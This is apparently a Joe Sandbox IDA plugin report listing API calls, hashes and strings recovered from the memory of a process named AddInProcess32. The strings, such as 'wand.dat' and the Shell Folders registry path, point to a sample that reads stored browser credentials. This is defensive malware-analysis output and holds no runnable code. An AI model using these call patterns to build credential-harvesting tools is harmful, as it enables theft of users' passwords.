                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_21_2_400000_AddInProcess32.jbxd
                                            Similarity
                                            • API ID: _snwprintfwcscpy
                                            • String ID: dialog_%d$general$menu_%d$strings
                                            • API String ID: 999028693-502967061
                                            • Opcode ID: 17378f80787d8f3ebe1be11f22ab444215ff95c87d82bd16ffe54226d060cac5
                                            • Instruction ID: 4b5f4d23dee208ad245a1fa3262b8d520e9fbefe09054bf07968a47f6ed58b46
                                            • Opcode Fuzzy Hash: 17378f80787d8f3ebe1be11f22ab444215ff95c87d82bd16ffe54226d060cac5
                                            • Instruction Fuzzy Hash: 1AE04FB5E8870035E92519A10C03B2A155086A6B5BF740C2BFD0AB11D2E47F955DA40F
                                            APIs
                                              • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1AE
                                              • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1B6
                                              • Part of subcall function 00414592: RegOpenKeyExW.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00414CC1,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00445DDE,?,?,00000000), ref: 004145A5
                                              • Part of subcall function 0040A9CE: free.MSVCRT ref: 0040A9DD
                                            • memset.MSVCRT ref: 0040C439
                                            • RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
                                            • _wcsupr.MSVCRT ref: 0040C481
                                              • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                              • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
                                              • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
                                              • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000000,?,?,00000000,?,0040320A,00000000,000000FF), ref: 0040A94F
                                            • memset.MSVCRT ref: 0040C4D0
                                            • RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
                                            • RegCloseKey.ADVAPI32(?,?,?,?,?,00000000,?), ref: 0040C508
                                            Memory Dump Source
                                            • Source File: 00000015.00000002.2400988614.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_21_2_400000_AddInProcess32.jbxd
                                            Similarity
                                            • API ID: free$EnumValuememset$CloseOpen_wcsuprmemcpywcslen
                                            • String ID:
                                            • API String ID: 4131475296-0
                                            • Opcode ID: eb77d7cad75ccead34f911285e165139a1ce78e2e313fb24f2a05cc2c8735199
                                            • Instruction ID: d2440758a7fd93b52fc88bd6111275bc9aa4df1ffeb01c53d5483546710cd2f3
                                            • Opcode Fuzzy Hash: eb77d7cad75ccead34f911285e165139a1ce78e2e313fb24f2a05cc2c8735199
                                            • Instruction Fuzzy Hash: A4411CB2900219BBDB00EF95DC85EEFB7BCAF48304F10417AB505F6191D7749A44CBA5
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000015.00000002.2400988614.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_21_2_400000_AddInProcess32.jbxd
                                            Similarity
                                            • API ID: AttributesFilefreememset
                                            • String ID:
                                            • API String ID: 2507021081-0
                                            • Opcode ID: afcad17dad9998b86119828d1b617f81507b1c6ffb5a90d063004130875e5eff
                                            • Instruction ID: e31a4ad29e7632976921f0390f19c15604a95804a640e9d04457ce0419b5f72c
                                            • Opcode Fuzzy Hash: afcad17dad9998b86119828d1b617f81507b1c6ffb5a90d063004130875e5eff
                                            • Instruction Fuzzy Hash: 1211E632A04115EFDB209FA49DC59FF73A8EB45318B21013FF911E2280DF789D8196AE
                                            APIs
                                            • AreFileApisANSI.KERNEL32 ref: 004174FC
                                            • MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 0041751A
                                            • malloc.MSVCRT ref: 00417524
                                            • MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 0041753B
                                            • free.MSVCRT ref: 00417544
                                            • free.MSVCRT ref: 00417562
                                            Memory Dump Source
                                            • Source File: 00000015.00000002.2400988614.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_21_2_400000_AddInProcess32.jbxd
                                            Similarity
                                            • API ID: ByteCharMultiWidefree$ApisFilemalloc
                                            • String ID:
                                            • API String ID: 4131324427-0
                                            • Opcode ID: 5d21432bc65b929392c7d49bf17a02b877e07d349bc8417fbf8b7ee350a515ff
                                            • Instruction ID: 8d188238c5fd2fb6163cec5331830b967abe0ebba74b79ef9884251e0929a2bc
                                            • Opcode Fuzzy Hash: 5d21432bc65b929392c7d49bf17a02b877e07d349bc8417fbf8b7ee350a515ff
                                            • Instruction Fuzzy Hash: 9701D4726081257BEB215B7A9C41DEF3AAEDF463B47210226FC14E3280EA38DD4141BD
                                            APIs
                                            • GetTempPathW.KERNEL32(000000E6,?,?,00417D63), ref: 004181DB
                                            • GetTempPathA.KERNEL32(000000E6,?,?,00417D63), ref: 00418203
                                            • free.MSVCRT ref: 0041822B
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000015.00000002.2400988614.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_21_2_400000_AddInProcess32.jbxd
                                            Similarity
                                            • API ID: PathTemp$free
                                            • String ID: %s\etilqs_$etilqs_
                                            • API String ID: 924794160-1420421710
                                            • Opcode ID: 15bc68a9d504a75b2650ebb6305fe60db7282026434a3c37ef8699a19a7f4611
                                            • Instruction ID: b359b55a6514fc6c55a0405950767d5f88b37029f74eadb26d8a0dc7501745d5
                                            • Opcode Fuzzy Hash: 15bc68a9d504a75b2650ebb6305fe60db7282026434a3c37ef8699a19a7f4611
                                            • Instruction Fuzzy Hash: 43313931A046169BE725A3669C41BFB735C9B64308F2004AFE881C2283EF7CDEC54A5D
                                            APIs
                                            • AreFileApisANSI.KERNEL32 ref: 00417497
                                            • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 004174B7
                                            • malloc.MSVCRT ref: 004174BD
                                            • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,?,00000000,00000000), ref: 004174DB
                                            • free.MSVCRT ref: 004174E4
                                            Memory Dump Source
                                            • Source File: 00000015.00000002.2400988614.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_21_2_400000_AddInProcess32.jbxd
                                            Similarity
                                            • API ID: ByteCharMultiWide$ApisFilefreemalloc
                                            • String ID:
                                            • API String ID: 4053608372-0
                                            • Opcode ID: 26b6d0d827bb447631a2da2f7ad9fad7d37cc7249bf214c4621a9d0d58d44de2
                                            • Instruction ID: 68224c9aa4b31b20fa5037399352f9c2f04b40a845063e8f60522cdb36b448b3
                                            • Opcode Fuzzy Hash: 26b6d0d827bb447631a2da2f7ad9fad7d37cc7249bf214c4621a9d0d58d44de2
                                            • Instruction Fuzzy Hash: DE01A4B150412DBEAF115FA99C80CAF7E7CEA463FC721422AF514E2290DA345E405AB9
                                            APIs
                                            • GetParent.USER32(?), ref: 0040D453
                                            • GetWindowRect.USER32(?,?), ref: 0040D460
                                            • GetClientRect.USER32(00000000,?), ref: 0040D46B
                                            • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0040D47B
                                            • SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 0040D497
                                            Memory Dump Source
                                            • Source File: 00000015.00000002.2400988614.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_21_2_400000_AddInProcess32.jbxd
                                            Similarity
                                            • API ID: Window$Rect$ClientParentPoints
                                            • String ID:
                                            • API String ID: 4247780290-0
                                            • Opcode ID: 51bf500d43eb7ed80d01eeab879738f26fa22579f9dd5d7918c8ee0e3f904b1b
                                            • Instruction ID: 8744084584fea1eb3916f9079d499296a2dd08f7759f51c0708cf8f54c9212ed
                                            • Opcode Fuzzy Hash: 51bf500d43eb7ed80d01eeab879738f26fa22579f9dd5d7918c8ee0e3f904b1b
                                            • Instruction Fuzzy Hash: 62018836801129BBDB11EBA6CC49EFFBFBCFF06310F048069F901A2180D778A5018BA5
                                            APIs
                                              • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                            • GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
                                            • ??2@YAPAXI@Z.MSVCRT(0000000A,?,?,00000104), ref: 004450BE
                                            • memset.MSVCRT ref: 004450CD
                                              • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                            • ??3@YAXPAX@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,00000104), ref: 004450F0
                                              • Part of subcall function 00444E84: memchr.MSVCRT ref: 00444EBF
                                              • Part of subcall function 00444E84: memcpy.MSVCRT(?,0044EB0C,0000000B,?,?,?,00000000,00000000,00000000), ref: 00444F63
                                              • Part of subcall function 00444E84: memcpy.MSVCRT(?,00000001,00000008,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00444F75
                                              • Part of subcall function 00444E84: memcpy.MSVCRT(?,?,00000010,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00444F9D
                                            • CloseHandle.KERNEL32(00000000,?,?,00000104), ref: 004450F7
                                            Memory Dump Source
                                            • Source File: 00000015.00000002.2400988614.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_21_2_400000_AddInProcess32.jbxd
                                            Similarity
                                            • API ID: Filememcpy$??2@??3@CloseCreateHandleReadSizememchrmemset
                                            • String ID:
                                            • API String ID: 1471605966-0
                                            • Opcode ID: 2aed10359402c50519c1c236b6adb34ede6eedef97d485569bed8d1556fc9971
                                            • Instruction ID: af7e2442fb2a0afe256a59df9b01c6fa6c67666c78107f96d02934f32f814c95
                                            • Opcode Fuzzy Hash: 2aed10359402c50519c1c236b6adb34ede6eedef97d485569bed8d1556fc9971
                                            • Instruction Fuzzy Hash: D8F0C2765002107BE5207736AC8AEAB3A5CDF96771F11893FF416921D2EE698814C1BD
                                            APIs
                                            • memset.MSVCRT ref: 004100FB
                                            • memset.MSVCRT ref: 00410112
                                              • Part of subcall function 0040F5BE: wcscpy.MSVCRT ref: 0040F5C3
                                              • Part of subcall function 0040F5BE: _wcslwr.MSVCRT ref: 0040F5FE
                                            • _snwprintf.MSVCRT ref: 00410141
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000015.00000002.2400988614.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_21_2_400000_AddInProcess32.jbxd
                                            Similarity
                                            • API ID: memset$_snwprintf_wcslwrwcscpy
                                            • String ID: </%s>
                                            • API String ID: 3400436232-259020660
                                            • Opcode ID: dc58dcbe4721772b8e09841cb0bf69786816bd9c9006e9a76d773a39c29a63fb
                                            • Instruction ID: d6b380c41b5e3e458bf6abeca455f552dea24a705517b0a2e3702c553642f250
                                            • Opcode Fuzzy Hash: dc58dcbe4721772b8e09841cb0bf69786816bd9c9006e9a76d773a39c29a63fb
                                            • Instruction Fuzzy Hash: 9B01DBF3D0012977D730A755CC46FEA76ACEF45304F0000B6BB08B3186DB78DA458A99
                                            APIs
                                            • memset.MSVCRT ref: 0040D58D
                                            • SetWindowTextW.USER32(?,?), ref: 0040D5BD
                                            • EnumChildWindows.USER32(?,Function_0000D4F5,00000000), ref: 0040D5CD
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000015.00000002.2400988614.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_21_2_400000_AddInProcess32.jbxd
                                            Similarity
                                            • API ID: ChildEnumTextWindowWindowsmemset
                                            • String ID: caption
                                            • API String ID: 1523050162-4135340389
                                            • Opcode ID: c23acb22e5a8502154e4be65b33a4ced3ce6ae2c099f2d24681839129fd3d8a7
                                            • Instruction ID: dcfab03f3ae0740f4c11e1fd8af26e22289cdce227bdcda27870e2dbaf68b2c3
                                            • Opcode Fuzzy Hash: c23acb22e5a8502154e4be65b33a4ced3ce6ae2c099f2d24681839129fd3d8a7
                                            • Instruction Fuzzy Hash: 50F08131D0031876FB206B95CC4EB8A3268AB04744F000076BE04B61D2DBB8EA44C69D
                                            APIs
                                              • Part of subcall function 00409BFD: memset.MSVCRT ref: 00409C07
                                              • Part of subcall function 00409BFD: wcscpy.MSVCRT ref: 00409C47
                                            • CreateFontIndirectW.GDI32(?), ref: 00401156
                                            • SendDlgItemMessageW.USER32(?,000003EC,00000030,00000000,00000000), ref: 00401175
                                            • SendDlgItemMessageW.USER32(?,000003EE,00000030,?,00000000), ref: 00401193
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000015.00000002.2400988614.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_21_2_400000_AddInProcess32.jbxd
                                            Similarity
                                            • API ID: ItemMessageSend$CreateFontIndirectmemsetwcscpy
                                            • String ID: MS Sans Serif
                                            • API String ID: 210187428-168460110
                                            • Opcode ID: 0ef3d87a35f2b5fcdfef1a077cef136f9d6d3eb82dfd4d3c6e3e8344e6d66d37
                                            • Instruction ID: 44e142790c58e2983bb51e892a2c7280827b5342727586ee11fe1c2be2fb852b
                                            • Opcode Fuzzy Hash: 0ef3d87a35f2b5fcdfef1a077cef136f9d6d3eb82dfd4d3c6e3e8344e6d66d37
                                            • Instruction Fuzzy Hash: 7CF082B5A4030877EB326BA1DC46F9A77BDBB44B01F040935F721B91D1D3F4A585C658
                                            APIs
                                            • memset.MSVCRT ref: 0040560C
                                              • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                              • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                              • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002,?,?,00402E6F), ref: 0040D24C
                                              • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                              • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                              • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                              • Part of subcall function 0040A45A: memset.MSVCRT ref: 0040A47B
                                              • Part of subcall function 0040A45A: _snwprintf.MSVCRT ref: 0040A4AE
                                              • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4BA
                                              • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4D2
                                              • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4E0
                                              • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4F3
                                              • Part of subcall function 0040A212: wcscpy.MSVCRT ref: 0040A269
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000015.00000002.2400988614.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_21_2_400000_AddInProcess32.jbxd
                                            Similarity
                                            • API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
                                            • String ID: *.*$dat$wand.dat
                                            • API String ID: 2618321458-1828844352
                                            • Opcode ID: 5e8bba3b09b46c55a34cdaf5677a7ea6a58b6119ecbf68cda4806ea60e88d929
                                            • Instruction ID: e27ea46a2f82f1f177a07810d763c9ecc86b2647b265d762bc330c580f82b585
                                            • Opcode Fuzzy Hash: 5e8bba3b09b46c55a34cdaf5677a7ea6a58b6119ecbf68cda4806ea60e88d929
                                            • Instruction Fuzzy Hash: BF419B71600205AFDB10AF65DC85EAEB7B9FF40314F10802BF909AB1D1EF7999958F89
                                            APIs
                                            • memset.MSVCRT ref: 00412057
                                              • Part of subcall function 0040A116: ShellExecuteW.SHELL32(?,open,?,0044E518,0044E518,00000005), ref: 0040A12C
                                            • SendMessageW.USER32(00000000,00000423,00000000,00000000), ref: 004120C7
                                            • GetMenuStringW.USER32(?,00000103,?,0000004F,00000000), ref: 004120E1
                                            • GetKeyState.USER32(00000010), ref: 0041210D
                                            Memory Dump Source
                                            • Source File: 00000015.00000002.2400988614.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_21_2_400000_AddInProcess32.jbxd
                                            Similarity
                                            • API ID: ExecuteMenuMessageSendShellStateStringmemset
                                            • String ID:
                                            • API String ID: 3550944819-0
                                            • Opcode ID: c6d93ad011cba3496463107dfdcdd9c7ff15c0246bd0a1dd9e2f28c94b3d1ec4
                                            • Instruction ID: 97bad96470fefb965444fbd8e179d7ef3b872eae7f66eff2ef5a186de824ffeb
                                            • Opcode Fuzzy Hash: c6d93ad011cba3496463107dfdcdd9c7ff15c0246bd0a1dd9e2f28c94b3d1ec4
                                            • Instruction Fuzzy Hash: 5341C330600305EBDB209F15CD88B9677A8AB54324F10817AEA699B2E2D7B89DD1CB14
                                            APIs
                                            • free.MSVCRT ref: 0040F561
                                            • memcpy.MSVCRT(00000000,?,00000001,g4@,00000000,0000121C,?,?,?,00403467), ref: 0040F573
                                            • memcpy.MSVCRT(00000000,?,?,00000000), ref: 0040F5A6
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000015.00000002.2400988614.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_21_2_400000_AddInProcess32.jbxd
                                            Similarity
                                            • API ID: memcpy$free
                                            • String ID: g4@
                                            • API String ID: 2888793982-2133833424
                                            • Opcode ID: 37ff6d91120af751e53e18efb23c18060f8529393ff4323a563ff9c980eac345
                                            • Instruction ID: 6372a4083673351870aa2a156e9431cadfa41d37230e9e7fabcd635cb7c3c96e
                                            • Opcode Fuzzy Hash: 37ff6d91120af751e53e18efb23c18060f8529393ff4323a563ff9c980eac345
                                            • Instruction Fuzzy Hash: D2217A30900604EFCB20DF29C94182ABBF5FF447247204A7EE852A3B91E735EE119B04
                                            APIs
                                            • memset.MSVCRT ref: 004144E7
                                              • Part of subcall function 0040A353: _snwprintf.MSVCRT ref: 0040A398
                                              • Part of subcall function 0040A353: memcpy.MSVCRT(?,00000000,00000006,00000000,0000000A,%2.2X ,?), ref: 0040A3A8
                                            • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 00414510
                                            • memset.MSVCRT ref: 0041451A
                                            • GetPrivateProfileStringW.KERNEL32(?,?,0044E518,?,00002000,?), ref: 0041453C
                                            Memory Dump Source
                                            • Source File: 00000015.00000002.2400988614.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_21_2_400000_AddInProcess32.jbxd
                                            Similarity
                                            • API ID: PrivateProfileStringmemset$Write_snwprintfmemcpy
                                            • String ID:
                                            • API String ID: 1127616056-0
                                            • Opcode ID: 02b9e3d0e0b7074fd9b2be70e01a8c10e85f5fbe64ebb4837650a41ca567b1c2
                                            • Instruction ID: e03fcf36bb778615f94f946172f2cadce4c7e53e7889dedf6030812535802df7
                                            • Opcode Fuzzy Hash: 02b9e3d0e0b7074fd9b2be70e01a8c10e85f5fbe64ebb4837650a41ca567b1c2
                                            • Instruction Fuzzy Hash: 9A1170B1500119BFEF115F65EC02EDA7B69EF04714F100066FB09B2060E6319A60DB9D
                                            APIs
                                            • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,7591DF80,?,0041755F,?), ref: 00417452
                                            • malloc.MSVCRT ref: 00417459
                                            • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,?,00000000,00000000,?,7591DF80,?,0041755F,?), ref: 00417478
                                            • free.MSVCRT ref: 0041747F
                                            Memory Dump Source
                                            • Source File: 00000015.00000002.2400988614.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_21_2_400000_AddInProcess32.jbxd
                                            Similarity
                                            • API ID: ByteCharMultiWide$freemalloc
                                            • String ID:
                                            • API String ID: 2605342592-0
                                            • Opcode ID: 393c83f8647a4e4e905b151b9ea1406947fc62e9018515f0e7f821d7fee9a8df
                                            • Instruction ID: 8389f0226c663b3c6d8c6253af8546a3d73aba679155ae8f7c82d0c1376384d0
                                            • Opcode Fuzzy Hash: 393c83f8647a4e4e905b151b9ea1406947fc62e9018515f0e7f821d7fee9a8df
                                            • Instruction Fuzzy Hash: 1DF0E9B620D21E3F7B006AB55CC0C7B7B9CD7862FCB11072FF51091180E9594C1116B6
                                            APIs
                                            • GetModuleHandleW.KERNEL32(00000000), ref: 00412403
                                            • RegisterClassW.USER32(?), ref: 00412428
                                            • GetModuleHandleW.KERNEL32(00000000), ref: 0041242F
                                            • CreateWindowExW.USER32(00000000,00000000,0044E518,00CF0000,00000000,00000000,00000280,000001E0,00000000,00000000,00000000), ref: 00412455
                                            Memory Dump Source
                                            • Source File: 00000015.00000002.2400988614.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_21_2_400000_AddInProcess32.jbxd
                                            Similarity
                                            • API ID: HandleModule$ClassCreateRegisterWindow
                                            • String ID:
                                            • API String ID: 2678498856-0
                                            • Opcode ID: ffa2941c40dc3e4da5dfeb6f60aef2ef72cf6d205e20c7803454451710b81cbd
                                            • Instruction ID: 2742b6e08e64d4f702ac0bdc031c2178a10537c5a2141806c9029dd5a11ba4c1
                                            • Opcode Fuzzy Hash: ffa2941c40dc3e4da5dfeb6f60aef2ef72cf6d205e20c7803454451710b81cbd
                                            • Instruction Fuzzy Hash: E601E5B1941228ABD7119FA68C89ADFBEBCFF09B14F10411AF514A2240D7B456408BE9
                                            APIs
                                            • memset.MSVCRT ref: 0040F673
                                            • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00007FFF,00000000,00000000,?,<item>), ref: 0040F690
                                            • strlen.MSVCRT ref: 0040F6A2
                                            • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0040F6B3
                                            Memory Dump Source
                                            • Source File: 00000015.00000002.2400988614.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_21_2_400000_AddInProcess32.jbxd
                                            Similarity
                                            • API ID: ByteCharFileMultiWideWritememsetstrlen
                                            • String ID:
                                            • API String ID: 2754987064-0
                                            • Opcode ID: 3f0454cb73c2afb10a3316e2dc28fa1dd1c693e32e23138b57773469a51e87f3
                                            • Instruction ID: e5447571fde1e0de43d26e7f5909b1ba013d3ab3fbf9ce0dfcc5e01eb4e41d37
                                            • Opcode Fuzzy Hash: 3f0454cb73c2afb10a3316e2dc28fa1dd1c693e32e23138b57773469a51e87f3
                                            • Instruction Fuzzy Hash: 03F062B680102C7FEB81A794DC81DEB77ACEB05258F0080B2B715D2140E9749F484F7D
                                            APIs
                                              • Part of subcall function 00409D7F: memset.MSVCRT ref: 00409D9E
                                              • Part of subcall function 00409D7F: GetClassNameW.USER32(?,00000000,000000FF), ref: 00409DB5
                                              • Part of subcall function 00409D7F: _wcsicmp.MSVCRT ref: 00409DC7
                                            • SetBkMode.GDI32(?,00000001), ref: 004143A2
                                            • SetBkColor.GDI32(?,00FFFFFF), ref: 004143B0
                                            • SetTextColor.GDI32(?,00C00000), ref: 004143BE
                                            • GetStockObject.GDI32(00000000), ref: 004143C6
                                            Memory Dump Source
                                            • Source File: 00000015.00000002.2400988614.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_21_2_400000_AddInProcess32.jbxd
                                            Similarity
                                            • API ID: Color$ClassModeNameObjectStockText_wcsicmpmemset
                                            • String ID:
                                            • API String ID: 764393265-0
                                            • Opcode ID: 511a8a1029f4fd91347c0110e60971c3c9d55721028eb227f3be943e95f629a7
                                            • Instruction ID: 55a1794077c12dabf0ba6e1c8d3319674f3f2ba5a0574a39bcd6537ad23d1771
                                            • Opcode Fuzzy Hash: 511a8a1029f4fd91347c0110e60971c3c9d55721028eb227f3be943e95f629a7
                                            • Instruction Fuzzy Hash: 3AF06835200219BBCF112FA5EC06EDD3F25BF05321F104536FA25A45F1CBB59D609759
                                            APIs
                                            • memcpy.MSVCRT(0045A808,?,00000050,?,0040155D,?), ref: 004134E0
                                            • memcpy.MSVCRT(0045A538,?,000002CC,0045A808,?,00000050,?,0040155D,?), ref: 004134F2
                                            • GetModuleHandleW.KERNEL32(00000000), ref: 00413505
                                            • DialogBoxParamW.USER32(00000000,0000006B,?,Function_000131DC,00000000), ref: 00413519
                                            Memory Dump Source
                                            • Source File: 00000015.00000002.2400988614.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_21_2_400000_AddInProcess32.jbxd
                                            Similarity
                                            • API ID: memcpy$DialogHandleModuleParam
                                            • String ID:
                                            • API String ID: 1386444988-0
                                            • Opcode ID: d55c8f406ca3c44be23ebae39d0952233c85391216aaf70b52daa0aa76105663
                                            • Instruction ID: 364e94b7bdcda47f4d7f1f8d7aeee0d56301a77e6e21c3ce81869cca2c347424
                                            • Opcode Fuzzy Hash: d55c8f406ca3c44be23ebae39d0952233c85391216aaf70b52daa0aa76105663
                                            • Instruction Fuzzy Hash: 80F0E272A843207BF7207FA5AC0AB477E94FB05B03F114826F600E50D2C2B988518F8D
                                            APIs
                                            • _snwprintf.MSVCRT ref: 0040A398
                                            • memcpy.MSVCRT(?,00000000,00000006,00000000,0000000A,%2.2X ,?), ref: 0040A3A8
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000015.00000002.2400988614.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_21_2_400000_AddInProcess32.jbxd
                                            Similarity
                                            • API ID: _snwprintfmemcpy
                                            • String ID: %2.2X
                                            • API String ID: 2789212964-323797159
                                            • Opcode ID: 565383a1db30c24bbe212324ccaa161bb2139c15501903e42e5a35b00c7b7038
                                            • Instruction ID: 802357eb4f50a043e47c8b78e7782d62930b20b04af67ea92e1f933aeb07fc5a
                                            • Opcode Fuzzy Hash: 565383a1db30c24bbe212324ccaa161bb2139c15501903e42e5a35b00c7b7038
                                            • Instruction Fuzzy Hash: 71118E32900309BFEB10DFE8D8829AFB3B9FB05314F108476ED11E7141D6789A258B96
                                            APIs
                                            • wcslen.MSVCRT ref: 0040B1DE
                                            • free.MSVCRT ref: 0040B201
                                              • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                              • Part of subcall function 004099F4: memcpy.MSVCRT(00000000,?,?,?,?,004027EB,00000004,?,?,?,00401F8F,00000000), ref: 00409A28
                                              • Part of subcall function 004099F4: free.MSVCRT ref: 00409A31
                                            • free.MSVCRT ref: 0040B224
                                            • memcpy.MSVCRT(?,00000000,-00000002,00000000,00000000,?,?,?,?,0040B319,0040B432,00000000,?,?,0040B432,00000000), ref: 0040B248
                                            Memory Dump Source
                                            • Source File: 00000015.00000002.2400988614.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_21_2_400000_AddInProcess32.jbxd
                                            Similarity
                                            • API ID: free$memcpy$mallocwcslen
                                            • String ID:
                                            • API String ID: 726966127-0
                                            • Opcode ID: 6421ea3f553dae7d25363b5bd64276aec0fbe05fa0d8b4b2605bf4838246495e
                                            • Instruction ID: 71128cbd9221161776fa816c6212d75478d488e0bdd8d9cf72ea7cd81dda7be0
                                            • Opcode Fuzzy Hash: 6421ea3f553dae7d25363b5bd64276aec0fbe05fa0d8b4b2605bf4838246495e
                                            • Instruction Fuzzy Hash: 02215BB2500604EFD720DF18D881CAAB7F9EF49324B114A6EE452976A1CB35B9158B98
                                            APIs
                                            • strlen.MSVCRT ref: 0040B0D8
                                            • free.MSVCRT ref: 0040B0FB
                                              • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                              • Part of subcall function 004099F4: memcpy.MSVCRT(00000000,?,?,?,?,004027EB,00000004,?,?,?,00401F8F,00000000), ref: 00409A28
                                              • Part of subcall function 004099F4: free.MSVCRT ref: 00409A31
                                            • free.MSVCRT ref: 0040B12C
